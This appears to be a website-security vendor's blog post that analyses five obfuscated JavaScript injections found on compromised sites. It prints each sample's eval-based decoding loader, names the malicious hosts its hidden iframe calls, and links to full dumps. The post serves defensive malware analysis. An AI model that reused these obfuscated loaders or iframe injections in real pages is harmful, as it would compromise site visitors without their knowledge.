5 samples of JavaScript threats detected on publicly available websites
Blacklisting check by Quttera website malware scanner |
Overview of the JavaScript threats injected into web pages
All of the presented threats were used to transparently inject malicious hidden iframes into legitimate web content and compromise visitors without any required user action.
Code obfuscation is an action which converts original source code or script into hardly understandable code. Obfuscated code or script is a code that passed through obfuscation and actually hides its initial purpose.
Usually, code/script obfuscation is done using publicly available automatic tools and doesn't require any prior knowledge or computer science degree to run it. Initially code obfuscation was used to protect intellectual property of developers but now it is widely used to obfuscate malicious scripts in order to overcome pattern based detection mechanisms that commonly installed on visitors' browsers.
All analyzed obfuscated web threats were found on home page of the infected sites. The script was executed during load of scanned website's home page. This means that content of pages referenced by hidden iframes were loaded by web browser before visitor even saw any content of the targeted website itself.
All analyzed obfuscated web threats were found on home page of the infected sites. The script was executed during load of scanned website's home page. This means that content of pages referenced by hidden iframes were loaded by web browser before visitor even saw any content of the targeted website itself.
Sample 1
Malicious action: inject hidden iframe to http://rock-reform[.]info/js/esd.php
- ps = "split";
- e = eval;
- v = "0x";
- a = 0;
- z = "y";
- try {
- a *= 25
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- --e("doc" + "ument")["\x62od" + z]
- } catch (q) {
- a2 = "_";
- sa = 0xa - 02;
- }
- z = "28_6e_7d_76_6b_7c_71_77_76_28_82_82_ ... 6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12" [ps](a2);
- za = "";
- for (i = 0; i < z.length; i++) {
- za += String["fromCharCode"](e(v + (z[i])) - sa);
- }
- zaz = za;
- e(zaz);
- }
Sample 2
Malicious action: inject hidden iframe to http://cerfust[.]nl/paprika/clik[.]php
- try {
- window.document.body++
- } catch (gdsgsdg) {
- dbshre = 147;
- }
- if (dbshre) {
- asd = 0;
- try {
- d = document.createElement("div");
- d.innerHTML.a = "asd";
- } catch (agdsg) {
- asd = 1;
- }
- if (!asd) {
- e = eval;
- }
- ss = String;
- asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25,..., 34, 53);
- s = "";
- for (i = 0; i - 484 != 0; i++) {
- if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
- }
- z = s;
- e(s);
- }
Full threat dump: http://pastebin.com/75Bu9XNb
Sample 3
Malicious action: inject hidden iframe to http://cafelum[.]ru/tmp/46nqizls.php
- d = "doc" + "ument";
- try {
- ++document.body
- } catch (q) {
- aa = function (ff) {
- for (i = 0; i < z.length; i++) {
- za += String[ff](e(v + (z[i])) - 12);
- }
- };
- };
- ps = "split";
- e = (eval);
- v = "0x";
- a = 0;
- z = "y";
- try {;
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- ++e(d)["bod" + z]
- } catch (q) {
- a2 = "_";
- }
- z = "2c_72_81_7a_6f_80_75_7b_ ... 34_35_47_19_16_89_19_16_89_19_16" [ps](a2);
- za = "";
- aa("fromCharCode");
- zaz = za;
- e(zaz);
- }
Sample 4
Malicious action: inject hidden iframe to http://oc-sports[.]com/email/clik.php
- ps = "split";
- e = eval;
- v = "0x";
- a = 0;
- z = "y";
- try {
- a *= 25
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- --e("doc" + "ument")["\x62od" + z]
- } catch (q) {
- a2 = "_";
- sa = 0xa - 02;
- }
- z = "28_6e_7d_76_6b_7c..._15_12_85_15_12_85_15_12" [ps](a2);
- za = "";
- for (i = 0; i < z.length; i++) {
- za += String["fromCharCode"](e(v + (z[i])) - sa);
- }
- zaz = za;
- e(zaz);
- }
Full threat dump: http://pastebin.com/kECUdVDE
Sample 5
Malicious action: generates and injects hidden iframes to random websites in *.ru area
- try {
- prototype % 2;
- } catch (asd) {
- x = 2;
- }
- try {
- q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" :"")]("p");
- q.appendChild(q + "");
- } catch (fwbewe) {
- i = 0;
- try {
- prototype * 5;
- } catch (z) {
- fr = "fromChar";
- f = [510, 702, 550, 594, 580, 630, 555, 660, ... 264, 160, 318, 240, 288, 205, 354];
- v = "eva";
- }
- if (v) e = window[v + "l"];
- w = f;
- s = [];
- r = String;
- z = ((e) ? "Code" : "");
- for (; 1776 - 5 + 5 > i; i += 1) {
- j = i;
- if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
- }
- if (f) e(s);
- }
Full threat dump: http://pastebin.com/3LJDBMCL
Summary
As stated earlier these threats were the reason for websites to get blacklisted. From their history they were not intentionally malicious but have been compromised to serve the hackers. Scanning your website can save you headache of getting out from blacklist and avoid traffic loss on the early stages of the attack.
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.
No comments:
Post a Comment